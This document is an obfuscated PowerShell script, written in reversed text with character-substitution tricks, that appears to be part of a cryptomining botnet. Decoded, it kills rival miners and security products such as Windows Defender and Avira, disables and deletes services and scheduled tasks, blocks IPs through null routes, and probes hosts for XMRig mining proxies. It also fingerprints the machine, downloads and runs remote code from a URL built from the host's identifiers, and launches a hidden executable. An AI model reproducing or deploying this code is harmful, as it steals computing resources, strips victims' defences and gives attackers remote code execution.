))yIPjF7yIP,yIPRm9yIP(EcAlPer.)43]RAhc[]GnirTS[,yIPyWuyIP(EcAlPer.)yIPJP6yIP,yIP1SeyIP(EcAlPer.)29]RAhc[]GnirTS[,yIPDaT'+'yIP(EcAlPer.)93]RAhc[]GnirTS[,)201]RAhc[+86]RAhc[+5'+'01]R'+'Ahc[((EcAlPer.)63]RAhc[]GnirTS[,)611]RAhc[+28]RAhc[+47]RAhc[((EcAlPer.)yIP 4 | 5 | 6 | } 7 | 8 | 006 sdnoceyIP+yIPS- peelS-tratS 9 | 10 | yWu...enodyIP'+'+yIP ll'+'ikyWu 11 | '+' 12 | relliyIP+yIPK 13 | 14 | yWu...llik ot yrtyWu 15 | 16 | }kaerb{ )00006 tg- )emit_tratstRJ-)yWus%yWu tamroFU- etaD-teG(('+'(fi 17 | 18 | {)eur'+'ttRJyIP+yIP(elihw 19 | 20 | yIP+yIP)(trats.restRJ 21 | 22 | 92556]renetsiLpcT.styIP+yIPekyIP+yIPcoS.teN.metsyS[=restRJ 23 | 24 | 0=yrter:labolgtRJ 25 | 26 | )(@=ehcaclaedpi:labolgtRJ'+' 27 | 28 | yWus%yWu tamroFU- etaD-teG=emit_tra'+'tstRJ 29 | 30 | } 31 | 32 | +'+'+yrtyIP+yIPer:labolgtRJ 33 | 34 | } 35 | 36 | } '+' 37 | 38 | }]2[eniltRJ =+ ehcacpyIP+yIPitRJ{)]2yIP+yI'+'P[eniltRJ sniatnocton- ehcacpitRJ(fi 39 | 40 | }'+' 41 | 42 | } '+' 43 | 44 | diprructRJ yxorpmsitRJ ]2[eniltRJ gsmdnes '+' 45 | 46 | ]2[eniltRJ =+ ehcaclaedpi:labolgtRJ yIP+yIP 47 | 48 | pitRJ pIyIP+yIPnab '+' '+' 49 | 50 | diprructRJ dnepsuSssecorP '+' 51 | 52 | {)0 en- yxorpmsitRJ(fi 53 | 54 | } yIP+yIP'+' 55 | 56 | yIP+yIP} 57 | '+' 58 | '+'2 = yxorpmsitRJ 59 | 60 | {)eurttRJyIP+yIP qe- )troptRJ pitRJ syxorpreni'+'msi((fi '+' '+' 61 | 62 | {esle }yIP+yIP 63 | 64 | 1 = yxorpmsitRyIP+yIPJ '+' '+' y'+'IP+yIP 65 | 66 | {)eurttRJ qe- )troptRJ yIP+y'+'IPpitRJ yxorprenimsyIP+yIPi((fi '+' 67 | 68 | 0 = yxorpmsyIP+yIPitRJ 69 | 70 | yWu...tseyIP+yIPt ptth dneyWuyIP+yIP tsoh-etirw 71 | 72 | yIP+yIP{)'+')eslaftRJ qe- )troptRJ pitRJ sptthsi(( dna- )esla'+'ftRJ qe- )t'+'roptRJ pitRJ ptthsi(((fi 73 | 74 | yWu...'+'troptRJ yIP+yIPpitRJ yIP+yIPyrtyWu tsoh-yIP+yIPeyIP+yIPtirw 75 | 76 | } yIP+yIP 77 | 78 | eunitnoc yIP+yIP 79 | 80 | pitRJ pInab yIP+yIP'+' 81 | 82 | diprruc'+'tRJ dnepyIP+yI'+'PsuSssecorP '+' 83 | 84 | {)]2[eniltRJ sniatnoc- yIP+yIPehc'+'aclaedpi:labolgtRJ(fi 85 | 86 | } '+' 87 | 88 | eunitnoc 89 | yIP+yIP 90 | {))0 el- troyIP+yIPptRJ( yIP+yI'+'Pro- )pitRJ '+'PIbuyIP+yIPPsi(ton- yIP+yIPro- )4 tl- htgnel.pitRJ( ro- )diprructRJ sniatnoyIP+yIPc- sdipptRJ( ro- )]2[eniltRJyIP+yIP sniyIP+yIPatnoc- ehcacpitRJ((fyIP+yIPi 91 | 92 | ]1'+'-[eniltRJ = diprructRJ'+' 93 | 94 | )y'+'IP+yIPfDi:fDi(tilyIP+yIPps.]2[eniltRJ = troptRJ,pitRJ yIP+yIP 95 | 96 | {))1- en- )yWu:'+'yWu(fOxedni.]2[yIP+y'+'IPeniltRJ( dna- ))(epytteg.yWuyWu qe-yIP+'+'yIP'+' )(epytteg.]2[eniltRJ( dna- yIP+yIP)yWuDEHSILBy'+'IP+yI'+'PATSEyWu(sniatnoc.ttRJ(fi yIP+yIP 97 | 98 | } '+' 99 | 100 | eunitnocyIP+yIP yIP+yIP 101 | 102 | ]1-[eniltRJ =+ sdipptRJ 103 | 104 | { )'+'))yWu866'+'34yWu(sniatnoc.]1[eniltRJ ro- )yIP+yIPyWu9663'+'yIP+yIP4yWu(sniatnyIP+yIPoc.]1[eniltRJ( dna-yI'+'P+yIP )yWuGNINETSILyWu(sniatnoc.'+'ttRJ( fi 105 | 106 | }'+' eunyIP+yIPitnoc { )l'+'luntRJ qe- eniltRJ( fi 107 | 108 | }_yIP+yIPtRJ{ ? 1Se)fDi fDi(tilps.ttRJ = e'+'ni'+'ltRJ 109 | 110 | { )nnocpcttRJ ni ttRJ( hcaerof 111 | 112 | yWu...snoitcennoc llikyWu tsoh-etirw 113 | 114 | detcetorpteg = sdipptRJ yIP+yIP'+' 115 | 116 | } 117 | 118 | piyIP+yIPpmettRJ pInabnu 119 | 120 | {)'+'ehcacpitRJ ni pipmettRJ(hcaeyIP+yIProf yIP+yI'+'P 121 | 122 | )fDi24.221.'+'302.951fDi,fDi344:981.432.711.58fDi'+',fDi344:42.152yIP+yIP.86.831yIP+yIPfDi,fDi344:132.99.85.671fDi,fDi344:9'+'1.4.86.831fDi,fD'+'i344:491.2.26.871fDi,fDi344:291.021.281.'+'202fDi,fDi344:021.26.722.561fDi,fDi08:42.15'+'2.86.831yIP+yIPfDyIP+yIPi,fDi08:132.99.8'+'5.671fDi,fDi08:09.681.86.yI'+'P+yIP831fDyIP+yIPi,fDyIP+yIPi08:77.94'+'1.781.071fDi(@=ehcacpitRJ 123 | 124 | PCT pona- tyIP+yIPatSteN ='+' nnocpcttRJ 125 | 126 | } yIP+yIP 127 | 128 | exe.rgmksy'+'IP+yIPaT htaPeliyIP+yI'+'PF- nedd'+'ih elytyIP+yIPSwodniW- ssecorP-tratS 129 | 130 | {)lluntRJ qe- mttRJ'+'(fi 131 | 132 | 133 | eunitnoCyltneliS nyIP'+'+yIPoityIP+yIPcArorrE- rgMksaT emaN- ssecorP-teG = mttRJ 134 | 135 | }yIP+yIP 136 | 137 | ecroF- ssecorP-potS 1Se eunitnoCyltneliS noitcArorrE- mtRJ emaN'+'y'+'IP+yI'+'P- ssecoyIP+yIPrP-teG 138 | 139 | { )reniMtRJ niyIP+yIP mtyIP+yIPRJ( hcaerof 140 | 141 | yWu...sessecorp llikyIP+yIPyWu tsoh-etirw '+' 142 | 143 | yWuserolp'+'xeyWuyIP+yIP,yWusseryWu,yWunoitatskroWyWu,'+'yWu1rgmksatyWu,yW'+'u*gixyIP+yIPyWu,yWuniwrofLQSyWu,yWuniwyWu,yWu'+'ecenrehocyWu,yWuarivAyWu,yWuxednyIP+yIPIhcraeSyWu,yWuitsohcvsyWu,yWu7979yWu,yWu6969yWu,yWu66yIP+yIP99yWu,yWu66yIP+yIP88yWu,yWu063yWyIP+yIPu,yWuEXE.smreTyWu,'+'yWurgeksatyW'+'u,yWugnigamIyWu,yWuprgyIP+yIPillaGyWu,yWugnirteSyWuyIP+yIP,yWuetsohnocyWu ,yWuatsninU'+'yWu ,y'+'WugyIP+yIPnitteSyWu ,yWupqeclqSyWuyIP+yIP ,yWuparg'+'illaCyIP+yIPyWu ,yWu68_46X_SSERPXELyIP+yIPQSyWu ,yWusmaucesy'+'Wu ,yWueesomslyWu ,yWuvrdxgyWu ,yWudpuavajyWu ,yWuaracyWu ,yWucsrscyWu ,yWuecivresyWu yIP+yIP,yWussracyWu 144 | 145 | ,yWuetadpuyWu ,yWu*rednefeDswodniWyWu ,fDi*retadpUswodniWfD'+'i ,yWucyIP+yIPeSSIImetsySyWu ,yWuSIImeyIP+yIPtsySyWu 146 | 147 | ,yWutsohyIP+yIPsvsyWu'+'yIP+yIP ,yWuedaegpuyIP+yIP-otuayWu ,yWyIP+yIP'+'uedaegpuyWu ,yWu1mmayyWyIP+yIPu ,yWun'+'obraCyWu ,yWuetaGreniMyWu'+' ,yW'+'udrenimyWu'+' ,yWu*girmxyWu,yWu*RyIP+yIPMXyWu ,yWuofnismyWu,yyIP+yIPWu02WDyWu,yWutluaFreWyWu,yWurgMreWyWu,yWuCSyWu = reniMyIP+yIPtRJ 148 | 149 | 150 | } 151 | 152 | lluNtRyIP+y'+'IPJ >2 F/ ksaTtRJ NT/ etyIP+yIPeleD/ ex'+'e.sks'+'aThcS 153 | 154 | { )yIP+yIPe'+'maNksaTtRJ yIP+yIPni ksaTtRJ( hcaeroyI'+'P+yIPf 155 | 156 | '+'yWu...sksat llikyWu tsoh-eyIP+yIPtirw 157 | 158 | yWueroCsn'+'DCEyWu,yWueroCsnDyWu,yWuecivreS swodniW rof ecivyIP+yIPres etadpUyyIP+yIPWu,yIP+yIPyWueroCsnDyWu,yWunim'+'dA-TARemiLyWu,yWunromeDpsiHyWu,yWutropysplcrewyWu,yWutuotupnIetlbaTyWu,yWuslaitnederCyWu,yWusrevreSbeWyWu,yWunacSsnDyWu,yIP+yIPyWusryI'+'P+yIPev'+'irdDyWu,yWushtooteulByWu,yWucvsNAwWyWu,yWyIP+yIPuisNtsofcsiMyWu,yWuredivorPpuorGemoHyWu'+',yWus'+'gifnoCyIP+yIPgniPelgyIP+yIPooGyWu,yWuksaTvaRyWuyIP+yIP,yWuhsalFyyIP+yIPWu,yWukrowemarfteNyWu,yWutsofcsiMyWu,yWudmcyksyyIP+yIPWu,yWuaMETSYSyWu,yWu2SNDyWu,yWuMETSYSyWu,yWyIP+yIP'+'uSNDyWu,yWu4etadpUyWu,yWu3etadyIP+yIPpUyWu,yWu2etadpUyWu,yWu1etadpUyWu,yW'+'uetadpUyWu,yWukcehC ytiruceyIP+yIPS goL '+'metsySyWu,yWusks'+'aTgoLswodniWyWu,yW'+'uSII'+'yWu'+',yWu3reyalPhsalFyWu,yWu2reyalPhsalyIP+'+'yIP'+'FyWu,yWu1reyalPhsalFyWuyIP+yIP,yWureyalPhsal'+'FebodAyWu,y'+'Wu3etadpUswodniWyWu,yWu2eyIP+yIPtadpUsw'+'odniWyyIP+yIPWu,yWu1etadpUsw'+'odniWyWuyIP+yIP,yWu'+'swodniw_etadpUyWu,yWuetadpU_swodniWyWu,yWuyrroSyWu,yWumgnyWu ,yIP+yIPyWum'+'gyWu ,yWustcudorp rof ecivres yIP+y'+'IPetadpUyWu ,yWuretrop'+'eR '+'stc'+'udoyIP+yIPrP elcarOyWu,yWuecivreS meyIP+'+'yI'+'PtsySbuS reloopSyWu ,yWuy'+'rtemeleT tfosor'+'ciMyWu ,yWuetadpyIP+yIPU avaJ elca'+'rOyWu ,yWuavaJ elcar'+'OyWu ,yWukoyWuyIP+yIP ,yWu3asyMyWu ,yWu2asyMyWu ,yW'+'u1asyMyWu ,yWuasyMyWu,yWu1yyIP+yIPmyW'+'u = emaNksaTtRJ 159 | 160 | 161 | } 162 | 163 | vrStRJ eteleyIP+yIPD exe.CS = lluNtRJ'+' 164 | 165 | vrStRJ potS exe.CS = lluNtRJ 166 | 167 | delbasiD =tyIP'+'+yIPratS vrStRJ gifnoCyIP+yIP exe.CS = lluNtRJ 168 | 169 | yIP+yI'+'P{ )emaNvrStRJ ni vrSt'+'RJ(hcaerof 170 | yIP+yIP 171 | yWu...secivres llyIP+yIPikyy'+'IP+yIPWu tsoh-etirw 172 | 173 | yWyIP+yIPuskoyIP+yIPoBpilCy'+'Wu,yWu23pledsaHniWyWu,yWu23pledadsa'+'HniWyWu,yWu23pleHnss'+'ssssiWyWu,yyIP+yIPWuRLC teN.yWu,yWurevreSorPrepuSyWu,yW'+'uzeihyIP+yIPreyIP+yIPSyWu,yWurevreS SNDyWu,yWulanoitaZyyIP+yIPWu,y'+'WuVStsnIxAyWu,yWyIP+yIPunoitazimitpo_rlcyWu,yWusretats_tenpsayWu,yWuscvSpleHniWyWuyIP+yIP,yWuMOC'+'yIP+yIP.NC.SODD.WWWyWu,yWuecivreSNVsserpxEyWu,yWusrevreSyIP+yIPbeWyWuyIP+yIP,yWu1rgmksatyyIP+yI'+'PWu,yWusvreSpAimwyWu,yWusvrSpAimwyWu,y'+'WuMGLAyWu,yWuecivreSifiWyWu,yWuLSDRSyWu,yWucvSepMyWu,yWuSCESPIyWu,yWusyTr063yWu,yWuxxxyftXyWu,yWuayftXyWu,yWuyIP+yIPyftXyWu,yWucvStluaVniW'+'yWu,yWuresualNcvSyWu,yWusreganaM swodniWyWu,yWuetad'+'pU_swodniWyWu,yWu0.2cvscessmyWu,yWu1.2cvscessmyWu,yWucvSni'+'WyWu,yWuSxSyWu,yWuyIP+yIPqeyalP aideyIP+yIPM noitpyrcnSy'+'Wu ,yWuAIDIVN aideM vitcAqmsMteyIP+yIPNyyIP+yIPWu '+',yWur'+'egnaMtpEcpRyWu ,yWurevresyIP'+'+yIPmaSyWuyIP+yIP ,yWu46pleHniWyWu,yyIP'+'+yIPWu23pleHnyIP+yIPiWyWu,yWuipwlanoitaNyWu,yWueialanoitaNyWu,yWuyIP+yIPllmlanoitaNyWu ,yWullolanoitaNyWu ,yWulanommitaNyyIP+yIPWyIP+yIPu ,yWulaaanoit'+'a'+'Ny'+'Wu ,yWulanoitaNyyIP+yIPWu,yWulduoguoSyWu ,yWuNSnPndmWyWu yIP+yIP,yWumgDaTyWu ,yWutgmsysyWu ,yWyIP+yIPuRLCyWu ,yWuetadpuelcarOyWu '+',yWumetsysyWu ,yyIP+'+'yIPWutyIP+yIP'+'fosorciMyyIP+'+'yIPWu ,yWuss'+'aslyWu ,yWuyrtemeleT tfosorciMyWu ,yWut'+'syIP+yIPoHSVSyWu ,yWuvrSdpWniWx'+'yWu = emaNyIP+yIPvyIP+yIPrStRJ 174 | 175 | { relliK noitc'+'nuF 176 | 177 | } 178 | 179 | 0.0.0.0 pitRJ eteyIP+yIPled'+' etuor 180 | 181 | {)pitRJ(pInabnu noitcnuf 182 | 183 | } 184 | 185 | p- yIP+yIP1 FI 0.0.0.0 pitRyIP+yIPJ dda etuor yIP+yIP 186 | 187 | {yIP+yIP)pitRJ(pInab yIP+yIPno'+'itcnuf 188 | 189 | } 190 | 191 | yIP+yIP}{hctac} 192 | 193 | )lru'+'tRyIP+yIPJyIP+yI'+'P(gnirtSdaolnwoD.)tneilCbeW.teN tcejbO-yIP+yIPweN( 194 | 195 | } yIP+yIP 196 | 197 | yWuemanptRJyIP+'+'yIP&di'+'pmtRJ&yxorpmsitRJ&pitRJ&diugtRJ&camtRJ&eyIP+yIPman_pmyIP+yIPoctRyIP+yIPJ&yrter:labolgtRJ&noiyIP+yIPsrevtRJ?nosj.killeryIP+yIP/lru'+'_nwodtRJyWu = lrutRJ yIP+yIP 198 | 199 | emaN ytreporPdnapxE- tyIP+yIPcejbO-tceleS 1Se dipmtRyIP+yIPJ di- ssecorP-teG = emanpyIP+yIPtRJ 200 | 201 | { esle } 202 | 203 | yWudiugtRJ&camtRJ&eman_pm'+'octRJ&yrter:labolgtRJ&noisrevtRJ'+'?nosj.oper_lk/lru_'+'nwod'+'tyIP+yIPRJyWu = lrutRJ yIP+yIP 204 | 205 | {)fDifyIP+yIPDi qe- pitRJ(fi 206 | 207 | EMANRETUPMOC:vnetRJ '+'= emyIP+yIPan_pmoctRJ 208 | 209 | DIUU.)tcudorPmetsySretuyIP+yIP'+'pmoC_23niW ty'+'IP+yIPcejboimw-teg( = diugtRJ yIP+yIP 210 | 211 | 1 tsrif- yIP+yIPtyIP+yIPcejbo-tceles 1S'+'e ss'+'erddacaM.)}eyIP'+'+yIPurttRJ QE- delbanepi._tRJ{ erehw 1Se noitarugifnoCretpadAyIP+yIPkrowteN_23niW tcejbOimW-tyIP+yIPeG( = cayIP+yIPmtRJ 212 | 213 | {yrt 214 | '+' 215 | {'+')dipmtRJ,yxorpmsitRJ,pitRJ(gsmdyIP+yIPnes noitcnuf 216 | 217 | } 218 | 219 | sdi'+'ptRJ nrut'+'er 220 | 221 | }dissecorp._tRJ{hcaerof1Se})emanrteg( qe- eman._tRJ ro- yWu*exe6yIP+yIPmtRJ*yWu ekil- hta'+'p._tRJ yIP+yIP'+'royIP+yIP- fDi*eyIP+yI'+'Pxe.nib.6m*fDi ekil- htap.'+'_tRJ '+'ro- fDi*exe.nib.g6m*fyIP+yIPDi ekyIP+yIP'+'il- htap._tRJ{tcejbO-erehW1SessecorP'+'_23niW ss'+'alC- tcejbOimW-teG=+sdiptRJ 222 | 223 | )(yIP+yIP@=sdyIP+yIPiptRJ 224 | 225 | )6,0(gnirtsbus.)))cayIP+yIPmtRJ+diugtRyIP+yIPJ+eman_pmoctRJ(setyBteG.8FTU::]gni'+'docnyIP+yIPE.txeT.metsys[( 5dmgyIP+yIP('+'=exe6mtRJ 226 | 227 | 1 tsri'+'f-yIP+yIP tc'+'ejbo-tcel'+'es '+'1Se sser'+'ddacaM.)}eurttRJ QE- delb'+'anepi._tRJyIP'+'+yIP{ erehw 1Se noitarugifnoCyIP+yIPretpadAkrowteN_23n'+'iW tcejbOimW-teG( = ca'+'mtRJ 228 | 229 | DIUU.)'+'tcudor'+'PmetsySretup'+'moC_23niyIP+yIPW tcejboimw-teg( = diugtRJ'+' 230 | 231 | EMANRETUPMOC:vnetRJ = eman_pmoctRJ 232 | 233 | } 234 | 235 | yWuLLUNLLUNyWu nyIP+yIPruter 236 | 237 | } 238 | yIP+yIP 239 | } yIP+yIP 240 | 241 | emanetRJ nruter yIP+yIP yIP+yIP'+' 242 | 243 | {)_5dmtRJyIP+yIP qe- 5dmttRJ(fi 244 | 245 | ))yyIP+yIPWyIP+yIPu'+'emanetRJDaThtaprtRJyWu(setyBllAyIP+yIPd'+'aeR::]eliF.OI[( 5yIP+yIPdmg=_5dmtRJ yIP+yIP 246 | 247 | {)semanetRJ ni emanetRJ(hcaerof 248 | 249 | ))yWuexe.llehsrewopDaThtaprtRJyWu(setyBllAdaeyI'+'P+yIPR::]eliF.OI[( 5dmg = 5dmyIP+yIPttRJ 250 | 251 | yIP+yIP}eman._tRJ{hcaeroy'+'IP+yIPf1Seexe'+'.'+'llehsrewyIP+yIPop edulcxE- '+'yIP+yIPexe.* e'+'dulcnI- yWu*DaT'+'htaprtyIP+yIPRJyWu icg = semanetRJ yIP+'+'yIP 252 | 253 | yWu0.1VDaTllehsrewopswodniWDaT23metsyIP+yIPySDaTswodniWDaT:CyWu=htaprtRJ 254 | 255 | } 256 | 257 | ltRJ nruter 258 | 259 | }'+')fDi2xfDi(gnirtSoT._tRJ=+ltRJ{hcayIP+yIPerof1Se)dtRJ(hsaHeyIP+yIPtupmoyIP+yIPC.)(etaerC::]'+'5DM.yhpargotpyrC.ytiruceS[ 260 | 261 | {)dtRJ(5dmg noitcnuf 262 | 263 | {)(emanrteg noitcnuf 264 | 265 | {)(detcetorpteg noitcnuf 266 | 267 | } 268 | 269 | ltRJ nruter 270 | 271 | })fDiyIP+yIP2xfDi(gnirtSoT'+'._tRJ=yIP+yI'+'P+ltRJ{hcaerof1Se)dtRJyIP+yIP(hsaHyIP+yIPetupmoC.)(etaerC::]5DM.yyIP+yIPhpargotpyrC.yt'+'yIP+yIPiryIP+yIPu'+'ceS[ 272 | 273 | {)dtRJ(5dmg noitcnuf 274 | 275 | } 276 | 277 | } 278 | '+' 279 | nruter 280 | 281 | yIP+'+'yIPyWussecoryIP+yIPp yn'+'yIP+yIPa esyI'+'P+yIPuap ot segelivyIP+yIPirp gniggyIP'+'+yIPubed eva'+'h ton od uoY :RORREyWu tsoh-etirw 282 | 283 | {esle 284 | 285 | } 286 | 287 | } 288 | 289 | yWu!dednepsus yIP+yIPyllufsseccus saw )ditRJ :DIP( ssecorp em'+'aNcorptRJ ehTyWyIP+yIPu tsoh-etirw 290 | 291 | {esle 292 | 293 | } 294 | 295 | yWu)ditRJ :DIP( emaNcorptRJ dnepsus yIP+yIPot elbanU :RORREyWu tsoh-etirw '+' 296 | 297 | {)eslaftRJ qe- dnepsustRJ( yIP+yIPfi '+' 298 | 299 | )ditRJ(ssecorPevityIP+yIPcAyIP+yIPgubeD::]23lenreK[ = dnepsustRJ yIP+yIP yIP+'+'yIP 300 | 301 | } '+' 302 | 303 | nyIP+yIPruter yIP+yIP 304 | 305 | yWussecorp siht'+' ot dehcatta reggubed a ydaerla si erehTyWu tsoh-etiyIP+yIPrw 306 | 307 | {)tneserPgubedtRJ('+' fi 308 | 309 | )tneserPgu'+'bed'+'tRJ]fer[,)eldnaH.)dyIP+yIPi'+'tRJ yIP+yIPdI- ssecorP-teG(((tneserPreggubeDetomyIP+yIPeRkcehC::]23yIP+yIPlenreK[ = yIP+yIPtuotRJ '+' 310 | 311 | oreZ::]yIP+yIPrtPtnI[ = tneserPgubeDtRJ 312 | 313 | yIP+yIP {)lluntRJ en- gubedtRJ('+'fi 314 | 315 | yIP+yIP}yWu*egelivirPgubeDeS*yWu ekil- _tRJ{tcejbO-erehW 1Se virp/ imaohw = gube'+'yIP+yIPdtRJ 316 | 317 | } 318 | 319 | nruter 320 | 321 | yWuregetni evitisop a tupniyIP+yIP tfDindid uoYyWu tsoh-etirw 322 | 323 | { )0'+' el- ditRJ( fi 324 | 325 | yWu...)ditRJ :DIP( emaNcorptRJ dnepsus ot gnitpmettAyWyIP+yIPu tsoh-etirW yIP+yIP 326 | 327 | } 328 | 329 | nruter 330 | 331 | yWuditRJ fo DI na htiw ssecorp on syIP+yIPi erehT :RORREyWyIP+yIPu tyIP+yIPsoH-etirW '+' 332 | 333 | {)lluntRJ qe- emaNcorptRJ(fi 334 | 335 | eman.)eunitnoCyltneliS noitcAroryIP+yIPrE- ditRJ di- ssecorP-teG( = emaNcorptRyIP+yIPJ 336 | 337 | {)ditRJ(dnep'+'suSssecorP noitcnuf 338 | 339 | fDi};)DIP tni(potSssecorPevitcAgubeD tni nyIP+yIPretxe citats cilbup ])yWulld.23ly'+'IP+yIPenrekyWu(tropmIllD[;)DIP tni(ssecorPeviyIP+yIPtcAgube'+'D tni nretxe citats cilbup ])yWulyIP+yIPld.23lenrekyWu(tropmIllD[;)tneserPreggubeDbp loob t'+'uoyIP+yI'+'P,ssyIP+yIPecorPh rtPtnI(tneserPreggubeDetom'+'eRkcehC yIP+yIPloob nretxe citats cilbup ])yWulld.23len'+'rekyWu(tropmIllD[{23lenreK ssa'+'lc citats cilbyIP+yIPup;secivreSporetnI.emitnuR.metsyS gnisu;lapicnirP.ytiruceS.yIP+yIPmetsyS gnisu;scitsong'+'aiD.metsyS'+' gnisu;metsyS gnisufDi noitinifeDepyT- epyT-dyIP+yIPdA 340 | 341 | } 342 | 343 | eslaftRJ nrute'+'r 344 | 345 | } 346 | 347 | euryIP+yIPt'+'tRJ n'+'rutyIP+yIPer '+' 348 | yIP+yIP 349 | yWu!!syxorp reyIP+yIPnimyWu tsoh-eyIP+yIPtir'+'w 350 | 351 | {)1- en- )yWuc'+'prnosjyWu(fOxedni.te'+'rtRJ(fi 352 | 353 | atadtRyIP+yIPJ troyIP+yIPptRJ pitRJ'+' tcennoc_lss = tertRJ 354 | 355 | fDi}}]yWuavek/xryWu,y'+'WuxyIP+yIPfs/xryWu,yWuqr'+'a/x'+'ryWu,yWuikol/xryWu,yWuwowyIP+yIP/xryWu,yWu0/xryWu,yWuelbuod/ncyWu,yWuslz/ncy'+'Wu,yIP+yIPyWuyIP+yIPzwr/ncyWu,y'+'Wuotr/ncyWu,yWuoax/ncyWu,yWuflah/nyIP+yIPcyWu,yWutsaf/ncyWu,yWur/ncyWu,yWu2/ncyWuyIP+yIP,yWu1/ncyWu[:yWuoglayWu,yWu1.yIP+yIP31.5/giRMXyWu:yIP+yIPyWutnegayWu,llunyIP+yIP:yWussapyWu,yWuxyWu:yWuyIP+yIPnigolyWuyIP+yIP{:yWusmarapyWu,'+'yWunigolyWu:yWudohtemyWu,yWu0'+'.2yWu:yIP+yIPyWucprnosjyWu,1:yWudiyWu{y'+'IP+yIPfDi = a'+'tadtRJ '+' 356 | 357 | {)troptRJ,pitRJ(syxoryIP+yIPprenimsi noitcnuf 358 | 359 | } 360 | 361 | eslaftRJ nryIP+yIPuter 362 | 363 | } 364 | 365 | euryIP+yIPttRJyIP+yIP nruter 366 | 367 | yWu!!yxorp ren'+'imyWu tsoh-etirw 368 | yIP+yIP 369 | {)1yIP+yIP- en- )yWyI'+'P+yIPucprno'+'sjyWu(fOxedni.tertRJ(fi 370 | 371 | yIP+yIPatadtyIP+yIPRJ troptRJyIP+yIP pitRJ tcennoc_wayIP+yIPr = tertRJ 372 | 373 | yyIP+yIPWunRm9yWu +yIP+yIP fDi}}]yWuavek/xryWu,yWuxfs/xryWu,yWuqra/xryWu,yWuikol/xryWu,yWuwow/xryWu,yWu0/xryWyIP+yIPu,yWuelbuod/ncyWu,yWuslz/nc'+'yWu,yWuzwr/ncyWu,yWuotr/ncyWu,yWuoax/ncyWu,yWuflah/ncyWuyIP+yIP,yWutsa'+'f/ncyWu,yWur/ncyWu,yWu2/ncyWu,yIP+yIPyWu1/ncyWu[:yWuoyIP+yIPglayWu,yWu1.31.5/giRMXyWu:yWutnegyIP+yIPayWu,llun:yWussapyWu,'+'yWuxyWu:yWyIP+yIPunigolyWu{:yWusmarapyWu,yWunigolyWu:yWudohtemyWu,yWu0.2yWu:yWucprnos'+'jyWu,1:yWudiyWu{fDi= atadtRJ 374 | 375 | {)troptRJ,pitRJ(yxorprenimsi noitcnuf 376 | 377 | } 378 | 379 | esyIP+yIPlaftRJ nruter '+' 380 | 381 | }yIP+yIP 382 | 383 | eurttRJ nruter 384 | 385 | {)1- en- )yIP+yIPyWu1/PTTHyWu(fOxedni.tertRJ(fi yIP+yIP 386 | 387 | atadtRJ troptRJ pitRJ tcennoc_lss = yIP+yIPtertRJ 388 | '+' 389 | yWunRm9nyIP+yIPRm91.1/PTTH / TEGyWu = atadtRJ 390 | 391 | {)troptRJ,pitRJ(sptthsi noityIP+y'+'IPcnuf 392 | 393 | '+'} 394 | 395 | eslaftRJ nruter 396 | 397 | } 398 | 399 | eurtyIP+yIPt'+'RJ n'+'ruter yIP+yIP 400 | 401 | {)1- en- )yWu1/'+'PTTHyWu(fOxyIP+yIPedni.tertRJ(fi 402 | 403 | atadtRJ yIP+yIPtroptRJ pitRJ tcennoc_war = tertRJ 404 | 405 | yIP+yIPyWunRm9nRm91.yIP+yIP1/PT'+'TH / TEGyWu=atadtRJ yIP+yIP 406 | 407 | {)troptRJ,pitRJ(ptthsi noitcn'+'uf 408 | 409 | } 410 | 411 | yWuyIP+yIPyWu nruter 412 | 413 | }{hctac} 414 | 415 | rtstRJyIP+yIP nruter 416 | 417 | )sertRyIP+yIPJ('+'gnirtsteyI'+'P+yIPg.IICSAyIP'+'+yIP::]gnidocnE.txeT[ = ryIP+yIPtstRJ 418 | 419 | ])1-vcertRJ(..0[sertRJ = sertRJ '+' 420 | 421 | )sertRJ(evieceR.kcostRJ = vcertRJ'+' 422 | 423 | )00001 ,)fDi'+'etybfyIP+yIP'+'DiyIP+yIP((ecnatsnIetaerC::]yarrA[ = sertRJ yIP+yI'+'P 424 | yIP+yIP 425 | 00yIP+yIP05 = tuoemiTevieceR.kcostRJ 426 | 427 | llun-tuo 1Se )yIP+yIP)setybtRJ((dyIP+yIPnes.kcostRJ 428 | yIP+y'+'IP 429 | )rts_dnest'+'RJ(setyBtyIP+yIPeG.IICSA::]gyIP+yIPnidocnE.tx'+'eT[ = setybtRJ 430 | 431 | tneilC.tneilctRJ = kcostRJ 432 | 433 | )troptRJ,pitRJ('+'tneilCpcT.stekcoS.teN TcEjbo-WEN = tneilctRyIP+yIPJ yIP+yIP 434 | 435 | {yrt 436 | 437 | {)rts_dnestRJ,troptR'+'J,pitRJ(tcennoyIP+yIPc_war n'+'oit'+'cnuf 438 | 439 | } 440 | 441 | tertRJ nru'+'ter 442 | 443 | }{hctac} 444 | 445 | )(esolc.yIP+yIPtekcostRJ 446 | 447 | )(eniLdaeR.redaertRJ = tertRJ 448 | 449 | )(hsulf.retirwt'+'RJ yIP+yIP 450 | yI'+'P+yIP 451 | )rts_dnestRJ('+'eniLetirW.retirwtRJ 452 | 453 | )maertSlsstRJyIP+yIP(redaeRmaertS.OI.metsyyIP+yIPS tcejbo-we'+'n = redyIP+yIPaertRJ 454 | 455 | )maertSlsyIP+'+'yIPstRJyIP+yIP(retirWmayI'+'P+yIPertS.OI.metsyS yIP+yIPtcejbo-wen = retiryIP+yIPwt'+'RJ 456 | 457 | )fDifDi(tneilCsAetacitnyIP+yIPehtuA.maertSlsstRJ yI'+'P+yIP 458 | 459 | 0005 = tuoemiTdaeR.maertSlsstRJ yIP+yIP 460 | 461 | ))]kcabllaCnoitadilaVetacifitreyIP+yIPCetomeR.ytiruceS.teN[ sa- }eurTtRJ{yIP+yIP(,es'+'laftRJ,)(maertSteG.tyIP+yIPekcostRJ(maertSlsS.yt'+'i'+'ruceS.teN.metsyS tcejbO-weN = maertSlsstRJ yI'+'P+yIP 462 | 463 | )troyIP+yIPptRJ ,pitRJ(tneilCpcT.stekcoSyIP+yIP.tyIP+yIPeN tcejbO-weyIP+yIPN = tekcostR'+'J yIP+yIP 464 | 465 | {yrt 466 | 467 | yIP+yIPyWuyWuyIP+yIP = tertRJ '+' 468 | 469 | {)rts_dnestRJ,troptRJyIP+yIP,pitRJ(tcennoc_lss noitcyIP+yIPnuf 470 | 471 | 472 | } 473 | 474 | eurttyIP+'+'yIPRJ nruter 475 | 476 | } 477 | 478 | } 479 | yIP+yI'+'P 480 | eslaftRJ nruter 481 | 482 | {)]1[]jtRJ[spIsertRJ qe- yIP+yIP)]0[]jtRJ[spIsertRJ dnab- gnolpitRJ((fi 483 | 484 | {)++jtRJ;tnuoc.spIsertRJ tl- jtRJ;0=jtRJ(rof 485 | 